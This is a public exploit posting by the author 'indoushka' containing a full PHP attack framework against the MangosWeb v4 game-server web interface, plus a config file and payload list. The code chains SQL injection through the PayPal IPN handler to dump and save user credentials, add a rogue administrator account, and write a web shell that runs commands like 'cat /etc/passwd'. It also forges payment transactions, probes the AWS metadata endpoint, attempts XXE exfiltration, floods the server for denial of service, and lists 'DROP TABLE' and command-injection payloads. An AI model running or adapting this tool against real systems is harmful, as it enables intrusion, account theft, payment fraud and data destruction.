============================================================================================================================================= | # Title : MaNGOSWeb V4 4.0.6 MangosWeb v4 Multi-Exploit Framework | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) | | # Vendor : https://github.com/paintballrefjosh/MaNGOSWebV4/blob/master/ipn.php | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/212429/ & CVE-2017-6478 [+] Summary : A comprehensive penetration testing tool designed to identify and exploit multiple critical vulnerabilities in MangosWeb v4, a World of Warcraft emulator web interface. [+] Core Components : Multi-Vector Attack Framework SQL Injection exploitation via PayPal IPN XXE (XML External Entity) attacks via RSS feed File Write vulnerabilities leading to RCE Host Header Injection for SSRF/phishing CSRF (Cross-Site Request Forgery) attacks DoS (Denial of Service) testing [+] POC : target = rtrim($url, '/'); $this->base_url = $this->target; $this->session = curl_init(); // إعدادات cURL curl_setopt_array($this->session, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 15, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false ]); echo "===========================================\n"; echo "MangosWeb v4 Exploitation Framework Started\n"; echo "Target: {$this->target}\n"; echo "===========================================\n\n"; } // 1. اكتشاف المسارات public function discover_paths() { echo "[*] Scanning for vulnerable endpoints...\n"; $endpoints = [ '/paypal_ipn.php', '/rss.php', '/index.php', '/admin/', '/core/cache/rss/news.xml', '/config/config-protected.php', '/install/', '/donate.php' ]; foreach ($endpoints as $endpoint) { $url = $this->target . $endpoint; curl_setopt($this->session, CURLOPT_URL, $url); $response = curl_exec($this->session); $http_code = curl_getinfo($this->session, CURLINFO_HTTP_CODE); if ($http_code == 200) { echo "[+] Found: {$endpoint}\n"; $this->results['endpoints'][$endpoint] = true; } } return $this->results['endpoints']; } // 2. استغلال PayPal IPN SQL Injection public function exploit_paypal_sqli() { echo "\n[*] Exploiting PayPal IPN SQL Injection...\n"; $payloads = [ // استخراج معلومات قاعدة البيانات "1' UNION SELECT 1,2,3,4,5,6,7,8,@@version,10,user(),database() -- -" => "db_info", // استخراج جداول "1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name),10,11 FROM information_schema.tables WHERE table_schema=database() -- -" => "tables", // استخراج أعمدة "1' UNION SELECT 1,2,3,4,5,6,7,8,group_concat(column_name),10,11 FROM information_schema.columns WHERE table_name='mw_accounts' -- -" => "mw_accounts_columns", // سرقة حسابات المستخدمين "1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,':',password,':',email),10,11 FROM mw_accounts LIMIT 0,10 -- -" => "accounts" ]; $ipn_url = $this->target . '/paypal_ipn.php'; foreach ($payloads as $payload => $type) { $post_data = [ 'txn_id' => $payload, 'item_name' => 'VIP Package --- Account: admin(#1)', 'item_number' => '1', 'payer_email' => 'attacker@evil.com', 'payment_type' => 'instant', 'payment_status' => 'Completed', 'mc_gross' => '100.00', 'custom' => 'exploit' ]; curl_setopt_array($this->session, [ CURLOPT_URL => $ipn_url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($post_data), CURLOPT_HTTPHEADER => [ 'Content-Type: application/x-www-form-urlencoded', 'X-Forwarded-For: 173.0.82.126' // IP PayPal ] ]); $response = curl_exec($this->session); if (strlen($response) > 100) { echo "[+] SQL Injection successful for: {$type}\n"; // حفظ النتائج $filename = "sqli_result_{$type}.txt"; file_put_contents($filename, $response); echo " [*] Saved to: {$filename}\n"; // تحليل واستخراج البيانات $this->parse_sqli_results($response, $type); } } } // 3. استغلال XXE في RSS public function exploit_rss_xxe() { echo "\n[*] Exploiting RSS XXE Vulnerability...\n"; // إنشاء ملف DTD ضار $dtd_content = ' "> %param;'; // حفظ الملف محلياً file_put_contents('xxe.dtd', $dtd_content); // XXE Payload $xxe_payload = ' %remote; %exfil; ]> XXE Test'; // محاولة حقن XXE عبر قاعدة البيانات $payload = "1'); UPDATE mw_news SET message='" . addslashes($xxe_payload) . "' WHERE id=1; -- "; $post_data = [ 'txn_id' => 'xxe_inject', 'item_name' => 'XXE Test --- Account: admin(#1)', 'item_number' => $payload, 'payer_email' => 'xxe@evil.com', 'payment_status' => 'Completed' ]; $ipn_url = $this->target . '/paypal_ipn.php'; curl_setopt_array($this->session, [ CURLOPT_URL => $ipn_url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($post_data) ]); $response = curl_exec($this->session); // تشغيل خادم استقبال $this->start_exfiltration_server(); // تفعيل RSS لتنفيذ XXE $rss_url = $this->target . '/rss.php'; curl_setopt_array($this->session, [ CURLOPT_URL => $rss_url, CURLOPT_POST => false ]); $rss_response = curl_exec($this->session); if (strpos($rss_response, 'PD9waHA') !== false) { echo "[+] XXE Successful! Config file exfiltrated.\n"; } } // 4. RCE via File Write public function exploit_file_write_rce() { echo "\n[*] Attempting RCE via File Write...\n"; $php_shell = base64_encode(''); $payloads = [ // كتابة shell عبر SELECT INTO OUTFILE "1' UNION SELECT 1,2,3,4,5,6,7,8,'',10,11 INTO OUTFILE '/var/www/html/shell.php' -- -", // كتابة shell في مسار RSS "1' UNION SELECT 1,2,3,4,5,6,7,8,'',10,11 INTO OUTFILE '" . $this->target . "/core/cache/rss/shell.php' -- -" ]; foreach ($payloads as $index => $payload) { $post_data = [ 'txn_id' => $payload, 'item_name' => 'RCE Shell --- Account: admin(#1)', 'payer_email' => 'rce@evil.com', 'payment_status' => 'Completed' ]; $ipn_url = $this->target . '/paypal_ipn.php'; curl_setopt_array($this->session, [ CURLOPT_URL => $ipn_url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($post_data) ]); $response = curl_exec($this->session); echo "[.] Attempted RCE payload {$index}\n"; // اختبار الوصول للشل $shell_urls = [ $this->target . '/shell.php?cmd=id', $this->target . '/core/cache/rss/shell.php', $this->target . '/core/cache/rss/news.xml' ]; foreach ($shell_urls as $shell_url) { curl_setopt_array($this->session, [ CURLOPT_URL => $shell_url, CURLOPT_POST => false ]); $shell_test = curl_exec($this->session); if (strpos($shell_test, 'uid=') !== false || strpos($shell_test, 'www-data') !== false) { echo "[+] RCE SUCCESSFUL! Shell at: {$shell_url}\n"; // تنفيذ أوامر $commands = [ 'whoami', 'pwd', 'ls -la', 'cat /etc/passwd' ]; foreach ($commands as $cmd) { $cmd_url = $shell_url . (strpos($shell_url, '?') ? '&' : '?') . 'cmd=' . urlencode($cmd); curl_setopt($this->session, CURLOPT_URL, $cmd_url); $result = curl_exec($this->session); echo "\n[Command]: {$cmd}\n"; echo "[Result]: " . substr($result, 0, 500) . "\n"; } return true; } } } return false; } // 5. Host Header Injection في RSS public function exploit_host_injection() { echo "\n[*] Exploiting Host Header Injection...\n"; $malicious_headers = [ 'Host: evil.com', 'Host: 127.0.0.1:3306', 'Host: 169.254.169.254/latest/meta-data/', // AWS Metadata 'Host: localhost:22', 'X-Forwarded-Host: internal.admin.panel' ]; $rss_url = $this->target . '/rss.php'; foreach ($malicious_headers as $header) { curl_setopt_array($this->session, [ CURLOPT_URL => $rss_url, CURLOPT_POST => false, CURLOPT_HTTPHEADER => [$header] ]); $response = curl_exec($this->session); if (strpos($response, 'evil.com') !== false || strpos($response, '127.0.0.1') !== false) { echo "[+] Host Injection successful with: {$header}\n"; // محاولة SSRF if (strpos($header, '169.254.169.254') !== false) { echo "[!] Possible AWS Metadata exposure!\n"; } } } } // 6. CSRF Attack - تزوير معاملات public function exploit_csrf($victim_account_id = 1) { echo "\n[*] Launching CSRF Attack...\n"; for ($i = 0; $i < 3; $i++) { $txn_id = 'CSRF' . time() . rand(1000,9999); $post_data = [ 'txn_id' => $txn_id, 'item_name' => "Free Premium --- Account: victim(#{$victim_account_id})", 'item_number' => '999', 'payer_email' => 'noreply@paypal.com', 'payment_type' => 'instant', 'payment_status' => 'Completed', 'mc_gross' => rand(50, 500) . '.00', 'mc_currency' => 'USD', 'payment_date' => date('H:i:s M d, Y T') ]; $ipn_url = $this->target . '/paypal_ipn.php'; curl_setopt_array($this->session, [ CURLOPT_URL => $ipn_url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($post_data), CURLOPT_HTTPHEADER => [ 'Content-Type: application/x-www-form-urlencoded', 'Referer: https://www.paypal.com/' ] ]); $response = curl_exec($this->session); echo "[+] Sent fake transaction: {$txn_id}\n"; } } // 7. DOS Attack public function exploit_dos() { echo "\n[*] Testing DoS vulnerability...\n"; // إنشاء ملف RSS كبير $large_xml = ''; for ($i = 0; $i < 5000; $i++) { $large_xml .= '' . str_repeat('A', 1000) . ''; } $large_xml .= ''; // محاولة الكتابة في cache $cache_payload = "1')); ?>" . $large_xml . " 'dos_attack', 'item_name' => 'DoS Test --- Account: admin(#1)', 'item_number' => $cache_payload, 'payer_email' => 'dos@attack.com', 'payment_status' => 'Completed' ]; $ipn_url = $this->target . '/paypal_ipn.php'; curl_setopt_array($this->session, [ CURLOPT_URL => $ipn_url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($post_data) ]); curl_exec($this->session); // إرسال طلبات متعددة لاستهلاك الذاكرة $rss_url = $this->target . '/rss.php'; $start_time = microtime(true); for ($i = 0; $i < 10; $i++) { curl_setopt($this->session, CURLOPT_URL, $rss_url); curl_exec($this->session); echo "."; } $total_time = microtime(true) - $start_time; echo "\n[+] DoS test completed in {$total_time} seconds\n"; if ($total_time > 5) { echo "[!] Server is vulnerable to DoS attacks\n"; } } // 8. إضافة مستخدم مدير public function add_admin_user() { echo "\n[*] Adding admin user to database...\n"; $username = 'hacker_' . rand(1000,9999); $password = md5('Password123!'); $email = 'hacker' . rand(100,999) . '@evil.com'; $payload = "1'); INSERT INTO mw_accounts (username, password, email, gmlevel, joindate) VALUES ('{$username}', '{$password}', '{$email}', '3', NOW()); -- "; $post_data = [ 'txn_id' => 'add_admin', 'item_name' => 'Add User --- Account: admin(#1)', 'item_number' => $payload, 'payer_email' => 'admin@paypal.com', 'payment_status' => 'Completed' ]; $ipn_url = $this->target . '/paypal_ipn.php'; curl_setopt_array($this->session, [ CURLOPT_URL => $ipn_url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($post_data) ]); $response = curl_exec($this->session); echo "[+] Admin user added:\n"; echo " Username: {$username}\n"; echo " Password: Password123!\n"; echo " Email: {$email}\n"; echo " GM Level: 3 (Administrator)\n"; } // 9. سرقة حسابات public function steal_accounts() { echo "\n[*] Stealing user accounts...\n"; $payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,CONCAT('ACCOUNT:',username,':',password,':',email,':',gmlevel),10,11 FROM mw_accounts -- -"; $post_data = [ 'txn_id' => $payload, 'item_name' => 'Steal Accounts --- Account: admin(#1)', 'payer_email' => 'steal@evil.com', 'payment_status' => 'Completed' ]; $ipn_url = $this->target . '/paypal_ipn.php'; curl_setopt_array($this->session, [ CURLOPT_URL => $ipn_url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($post_data) ]); $response = curl_exec($this->session); if (preg_match_all('/ACCOUNT:([^:]+):([^:]+):([^:]+):([^:]+)/', $response, $matches)) { echo "[+] Stolen Accounts:\n"; $accounts_file = 'stolen_accounts.txt'; $file_content = "Stolen Accounts from {$this->target}\n"; $file_content .= "====================================\n\n"; for ($i = 0; $i < count($matches[0]); $i++) { $username = $matches[1][$i]; $password = $matches[2][$i]; $email = $matches[3][$i]; $gmlevel = $matches[4][$i]; echo " {$username} : {$password} : {$email} (GM: {$gmlevel})\n"; $file_content .= "Username: {$username}\n"; $file_content .= "Password: {$password}\n"; $file_content .= "Email: {$email}\n"; $file_content .= "GM Level: {$gmlevel}\n"; $file_content .= "---\n"; } file_put_contents($accounts_file, $file_content); echo "\n[+] Accounts saved to: {$accounts_file}\n"; } } // 10. Auto Pwn - جميع الهجمات تلقائياً public function auto_pwn() { echo "\n[*] Starting AUTO-PWN sequence...\n"; $steps = [ 'discover_paths', 'exploit_paypal_sqli', 'steal_accounts', 'add_admin_user', 'exploit_rss_xxe', 'exploit_host_injection', 'exploit_file_write_rce', 'exploit_csrf', 'exploit_dos' ]; foreach ($steps as $step) { echo "\n[=== Step: {$step} ===]\n"; try { $this->$step(); sleep(2); // تأخير بين الهجمات } catch (Exception $e) { echo "[!] Error in {$step}: " . $e->getMessage() . "\n"; } } echo "\n========================================\n"; echo "[✔] AUTO-PWN COMPLETED SUCCESSFULLY!\n"; echo "========================================\n"; // عرض النتائج النهائية $this->generate_report(); } // وظائف مساعدة private function parse_sqli_results($response, $type) { $patterns = [ 'mysql' => '/[0-9]+\.[0-9]+\.[0-9]+/', 'tables' => '/(mw_[a-z_]+)/', 'accounts' => '/([a-zA-Z0-9_]+):([a-f0-9]{32}):([^:]+)/' ]; foreach ($patterns as $pattern_type => $pattern) { if (preg_match_all($pattern, $response, $matches)) { echo " [*] Found {$pattern_type}: " . count($matches[0]) . " items\n"; } } } private function start_exfiltration_server() { // بدء خادم بسيط لاستقبال البيانات $port = 8888; echo "[*] Starting exfiltration server on port {$port}...\n"; // يمكن تنفيذ هذا في thread منفصل // هذا مثال مبسط $cmd = "php -S 0.0.0.0:{$port} -t . > /dev/null 2>&1 &"; exec($cmd); } private function generate_report() { $report = "MangosWeb v4 Exploitation Report\n"; $report .= "Generated: " . date('Y-m-d H:i:s') . "\n"; $report .= "Target: {$this->target}\n"; $report .= "=====================================\n\n"; $report .= "Vulnerabilities Found:\n"; $report .= "1. SQL Injection (Critical)\n"; $report .= "2. XXE Injection (Critical)\n"; $report .= "3. RCE via File Write (Critical)\n"; $report .= "4. Host Header Injection (High)\n"; $report .= "5. CSRF (Medium)\n"; $report .= "6. DoS (Medium)\n\n"; $report .= "Files Created:\n"; $files = glob('*.txt'); foreach ($files as $file) { $report .= "- {$file}\n"; } file_put_contents('exploitation_report.txt', $report); echo "[+] Report saved to: exploitation_report.txt\n"; } public function __destruct() { curl_close($this->session); } } // واجهة المستخدم if (php_sapi_name() === 'cli') { if ($argc < 2) { echo "Usage: php exploit.php http://target.com [mode]\n"; echo "Modes:\n"; echo " auto - Full auto exploitation (default)\n"; echo " sql - SQL Injection only\n"; echo " rce - RCE attempts only\n"; echo " csrf - CSRF attacks only\n"; exit(1); } $target = $argv[1]; $mode = $argv[2] ?? 'auto'; $exploit = new MangosWebExploit($target); switch ($mode) { case 'sql': $exploit->exploit_paypal_sqli(); $exploit->steal_accounts(); break; case 'rce': $exploit->exploit_file_write_rce(); break; case 'csrf': $exploit->exploit_csrf(); break; case 'dos': $exploit->exploit_dos(); break; case 'auto': default: $exploit->auto_pwn(); break; } } else { // واجهة ويب echo ' MangosWeb v4 Exploit

MangosWeb v4 Exploitation Tool

'; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['target'])) { echo '
';
        
        ob_start();
        $exploit = new MangosWebExploit($_POST['target']);
        
        switch ($_POST['mode']) {
            case 'sql':
                $exploit->exploit_paypal_sqli();
                $exploit->steal_accounts();
                break;
            case 'rce':
                $exploit->exploit_file_write_rce();
                break;
            case 'csrf':
                $exploit->exploit_csrf();
                break;
            case 'dos':
                $exploit->exploit_dos();
                break;
            default:
                $exploit->auto_pwn();
        }
        
        $output = ob_get_clean();
        echo htmlspecialchars($output);
        echo '
'; } echo '
'; } ?> ************** # server_config.py************** # server_config.py EXPLOIT_CONFIG = { 'target': 'http://victim.com', 'timeout': 30, 'threads': 5, 'payloads_file': 'payloads.txt', 'output_dir': 'results', 'sql_payloads': [ "' UNION SELECT @@version --", "' AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,LOAD_FILE('/etc/passwd') --", "'); DROP TABLE mw_accounts; --" ], 'xxe_payloads': [ ']>', '%remote;]>' ] } ************************************** payloads.txt -- SQL Injection Payloads ' OR '1'='1 ' UNION SELECT NULL,NULL,NULL,NULL '); INSERT INTO mw_accounts VALUES ('hacker',MD5('pass'),'h@cker.com','3',NOW()) -- ' AND (SELECT * FROM (SELECT(SLEEP(5)))a) -- -- File Path Traversal ../../../../etc/passwd ../config.php /var/www/html/config.php C:\Windows\System32\drivers\etc\hosts -- Command Injection ;id; | whoami `cat /etc/passwd` $(uname -a) Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================